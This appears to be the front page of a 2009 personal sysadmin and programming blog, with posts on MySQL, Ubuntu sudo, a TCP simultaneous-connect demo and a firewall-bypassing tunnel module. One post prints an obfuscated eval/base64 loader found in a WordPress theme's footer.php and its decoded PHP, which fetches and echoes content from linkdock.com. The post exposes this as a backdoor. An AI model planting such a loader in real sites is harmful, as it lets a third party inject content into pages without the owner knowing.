Home
Software
My Italian Blog
Dark Room
Curriculum Vitae
About
Contact
 

Wednesday, July 1. 2009

Quote of the Day


So The Pirate Bay has executed the Web 2.0 business plan to perfection: give someone else's stuff away for free - then find a bigger idiot to buy the company.

[...] in the case of Web 2.0, companies go from "pre-revenue" to "post-revenue" without any revenue in between. That's where you need a bigger idiot.


-- Andrew Orlowski, on The Register
Posted by Simone in IT & Technology, Quotes at 11:02 | Comments (0) | Trackbacks (0)
9 hits
Defined tags for this entry: , , ,

Tuesday, June 30. 2009

LogMiner 1.23

Version 1.23 of LogMiner, my Apache/IIS log analysis package, is now available.

This release mainly fixes some build problem on modern distributions.

Also it finally includes the cleanup function I was talking about some days ago...
Posted by Simone in Software, SysAdmin at 10:42 | Comments (0) | Trackbacks (0)
16 hits
Defined tags for this entry: , , , , , ,

Monday, June 15. 2009

Definition of the Day - Web 2.0


Q: Web 2.0 - are we speaking from hindsight when we try to define it?

A: We are speaking from no sight at all.

"Web 2.0" is a catch word coined by Tim O'Reilly who was trying to sell books for his publishing company. In my opinion, it was the saddest moment of O'Reillys careeer as for the most part, he brings clarity to technology not gummy eyewash and wool.

There is no spec, no standards committee, no list of particular technologies. It's just a vague slide made by O'Reilly that doesn't even include all the latest technologies and implies some are new that are not.
[...]


-- read on LinkedIn
Posted by Simone in IT & Technology at 16:33 | Comments (0) | Trackbacks (0)
32 hits
Defined tags for this entry: , , , , ,

Friday, June 12. 2009

I do hate MySQL

I can't stand it, really.

I'm using it at the moment only because I'm forced to. I can't help considering it as a toy DB, especially comparing it to PostgreSQL or SQL Server or any other serious RDBMS.

The last thing that hit my nerve is this bug. Come on... can't it even handle foreign keys in a decent way?

And I'm trying not to think that it allows you to define a table with foreign keys and silently ignore them.

</rant>
Posted by Simone in Software Development at 10:25 | Comment (1) | Trackbacks (0)
66 hits
Defined tags for this entry: , ,

Monday, June 8. 2009

Snow Leopard upgrade at $29

Hey, I'm following the live coverage of WWDC and just read this nice detail... that is a good price for a little update, Microsoft should learn a lesson or two... :-)
Posted by Simone in Software at 19:48 | Comments (0) | Trackbacks (0)
84 hits
Defined tags for this entry: , , , ,

Thursday, May 28. 2009

Dark Room

After having used and abused Big Huge Labs' On Black Flickr tool, I finally decided to start my very own Dark Room.

It'll be my personal black & white photo gallery, a portfolio of sorts.
Posted by Simone in Photography at 21:26 | Comments (0) | Trackbacks (0)
88 hits

Tuesday, May 26. 2009

Backdoor in WordPress themes?

I was looking for a theme to use in a WordPress blog and I stumbled on this one.

Cool, I thought, I might use it... but... hey... why there's this weird stuff in footer.php?

<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0
NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWEC
ePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc
5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRL
vlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/
b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5
p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBa
hOh0EIT7b8A'))); ?>
 

Uhm... it looks very suspicious. Too suspicious. Let's change eval with die and check what's all that stuff:

error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".
                  urlencode($_SERVER["HTTP_HOST"])."&uri=".
                  urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) ||
     intval(ini_get("allow_url_fopen"))) &&
     function_exists("file_get_contents")) {

        echo @file_get_contents($CodeURL);

} elseif ((intval(get_cfg_var("allow_url_fopen")) ||
                        intval(ini_get("allow_url_fopen"))) && function_exists("file")) {

        $content = @file($CodeURL);
        echo @join("", $content);

} elseif (function_exists("curl_init")) {

        $ch = curl_init($CodeURL);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_exec($ch);
        curl_close($ch);
}
 

Yep. It definitely looks like a backdoor.

It seems that you can never be too much careful...

(it seems like the first version I've download is different than the one on the site mentioned above, although there's still something evil in footer.php)
Posted by Simone in Software at 19:55 | Comments (0) | Trackbacks (0)
112 hits
Defined tags for this entry: , , , ,

Saturday, May 2. 2009

FeedbackReporter and Mantis integration

I've just written a small script to store reports generated by FeedbackReporter on a Mantis system.

It should come handy to keep track of your application crashes (crash? uh? My apps never crash! :-))

You can download it here.

Simply extract it on your webserver and edit config.php to adjust your settings.

It can work in two ways: if you're installing it on the same server running mantis, set MANTIS_LOCAL to true and MANTIS_PATH to the root of your mantis installation.

Otherwise, you can even install it on a different server and let it communicate with your mantis via SOAP. In order to do this, set MANTIS_LOCAL to false and edit MANTIS_URL. This setup needs the SOAP extension of PHP5, so make sure it's available.

Feedback is welcome, of course.
Posted by Simone in Software Development at 14:23 | Comments (0) | Trackbacks (0)
208 hits
Defined tags for this entry: , ,

Wednesday, April 29. 2009

Perplexed about Ubuntu's sudoers configuration

Recently I've been administering my first Ubuntu machine and I already feel a bit perplexed about its security setup.

The issue is that by default, the root account password is locked in Ubuntu and you are encouraged never to use root, but rely on sudoers for system administration.

I've read the rationale on Ubuntu's wiki and I agree on some points, but their mindset is totally biased towards a desktop setup.

Let's consider these points from their site:

  • Benefits of using sudo: Users don't have to remember an extra password.
    This is cool for Average Joe, but don't tell me that it's an advantage on a serious server: it's actually a downside, see the next point.


  • Every cracker trying to brute-force their way into your box will know it has an account named root and will try that first. What they don't know is what the usernames of your other users are. Since the root account password is locked, this attack becomes essentially meaningless, since there is no password to crack or guess in the first place.

    Sure, the attack on root becomes useless, too bad that SSH brute-force attacks usually try lots of different usernames. If the manage to break a single account of a sudoer, they automatically have control of your machine. If you had to remember a different password to su your way, it would make their life a bit harder.


  • Allows easy transfer for admin rights, in a short term or long term period, by adding and removing users from groups, while not compromising the root account.

    err... what does "not compromising the root account" actually mean? If I get admin rights, I can do whatever I want, including compromising any account. Unless I get authorisation just to run a limited set of commands through sudo, but that's not the point of this post.


  • The root account password does not need to be shared with everybody who needs to perform some type of administrative task(s) on the system.

    ok, but what problem does it solve? (apart from avoiding people shouting the root password when they shouldn't :-))

    If I want to remove a person from the admin group, I need to trust her not to have planted any malicious program (rootkits, backdoors...) or rebuild the system if I'm paranoid, if I really want to be on the safe and paranoid side.

    IMHO, it's just the same as changing the root password when one is gone, or even better, periodically.



I'm not convinced. I still prefer the common su approach typical of almost all the other distributions...
Posted by Simone in SysAdmin at 13:47 | Comments (0) | Trackbacks (0)
260 hits
Defined tags for this entry: , , , , ,

Sunday, April 12. 2009

mod_tunnel for Apache 2.2.x

mod_tunnel is a simple Apache module that can be used to create TCP tunnels using your Web server. It is useful to expose services which can be reached through a proxy, bypassing firewalls.

After only 4 years since the previous version, you can now download version 2.0 which works with Apache 2.2.x (and maybe 2.0.x, but I haven't tested it).

You'll find it on sourceforge.
Posted by Simone in Software, SysAdmin at 17:52 | Comments (0) | Trackbacks (0)
291 hits
Defined tags for this entry: , , , , , ,

Tuesday, February 10. 2009

Connection without a listening socket?

I've encountered a network problem that left me a bit puzzled.

Usually, when you want to setup a TCP connection between two sockets (let's called them S1 and S2), you need to perform these steps on the server:


  • create S1

  • bind S1 to a port (or to a port/address, if you need to)

  • set S1 to listen for connections



on the client:


  • create S2

  • tell S2 to connect to S1



and finally, the server receives the connection attempt and accepts it to remove it from the backlog of the listening socket.

Well, apparently there's another way, which I suspect few know about.

Check out this simple application:


using System;
using System.Net;
using System.Net.Sockets;
using System.Threading;

namespace SocketTest
{
        class Program
        {
                private static IPEndPoint       a = new IPEndPoint( IPAddress.Loopback, 18000 );
                private static IPEndPoint       b = new IPEndPoint( IPAddress.Loopback, 18001 );

                static void Main(string[] args)
                {
                        Thread  threadA = new Thread( ThreadA );
                        Thread  threadB = new Thread( ThreadB );

                        threadB.Start();
                        threadA.Start();
                }

                static void ThreadA()
                {
                        for(;;) {
                                try {
                                        Socket sock = new Socket( a.AddressFamily, SocketType.Stream, ProtocolType.Tcp );

                                        sock.Bind( b );
                                        sock.Connect( a );

                                        Console.WriteLine( "Connected from " + b + " to " + a );

                                        Thread.Sleep( Timeout.Infinite );
                                }
                                catch {     
                                }
                        }
                }

                static void ThreadB()
                {
                        for(;;) {
                                try {
                                        Socket sock = new Socket( b.AddressFamily, SocketType.Stream, ProtocolType.Tcp );

                                        sock.Bind( a );
                                        sock.Connect( b );

                                        Console.WriteLine( "Connected from " + a + " to " + b );

                                        Thread.Sleep( Timeout.Infinite );
                                }
                                catch {     
                                }
                        }
                }
        }
}
 


Let's see what happens compiling and running it:



Yes, you get a connection between the two sockets. It's something I was never told about and I would have never expected to see. But it's correct as per RFC 793.

I've found out about it when a couple of clients on a test system started connecting between themselves, while they were supposed to connect to 2 different servers on localhost. Both clients were periodically trying to connect to their server, which was down. They were creating a new socket for every attempt, without binding it, thus Windows' TCP/IP stack assigned a sequential port number to them. Eventually, the two processes reached the configuration required for the "Simultaneous Connection Synchronization" as described in the RFC.

Interesting. I guess you live and you learn.
Posted by Simone in Software Development at 12:25 | Comments (0) | Trackbacks (0)
337 hits

Monday, January 5. 2009

Don't shout at your hard drives!

It appears that hard drives don't like it...



It also proves that some sysadmins have far too much time to spare. ;-)
Posted by Simone in Fun, SysAdmin at 13:47 | Comments (0) | Trackbacks (0)
511 hits
Defined tags for this entry: , , ,

Thursday, December 25. 2008

Merry Christmas


Merry Christmas
Merry Christmas to everyone!

Posted by Simone in Photography at 19:43 | Comments (0) | Trackbacks (0)
375 hits
Defined tags for this entry: ,

Wednesday, October 1. 2008

Back in 2001

Nowadays everyone knows Google. But do you remember how it looked like in 2001?

Let's have a look... you can even perform searches and get the same results you would have obtained seven years ago :-)
Posted by Simone in IT & Technology at 15:01 | Comments (0) | Trackbacks (0)
1350 hits

Sunday, September 14. 2008

Quote of the Day

So they told me that using the download page to download something was not something they anticipated.


-- Bill Gates, supposedly
Posted by Simone in Quotes at 21:15 | Comments (0) | Trackbacks (0)
683 hits
(Page 1 of 6, totaling 85 entries) » next page

About me


Simone

Born in Guastalla the 14th of February, 1978; since I was a child I've always enjoyed disassembling (and re-assembling, often succesfully) everything I could put my hands on.


Eventually I ended up disassembling and re-assembling software... it's not exactly the same thing as dismantling toys, but it can be equally funny ;-)


View Simone Tellini's profile on LinkedIn


Nota per i connazionali: la maggior parte di questo sito è in inglese, in modo da poter essere compreso dalla maggior parte delle persone che passano di qui.

Flickr

www.flickr.com
Questo è un badge Flickr che mostra le foto pubbliche e/o i video di Wiz78. Crea il tuo badge qui.

Categories


All categories

Show tagged entries

Quicksearch

Calendar

Back July '09 Forward
Mon Tue Wed Thu Fri Sat Sun
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

Archives

Syndicate This Blog
  Copyright ©2002-2009 by Simone Tellini. All rights reserved.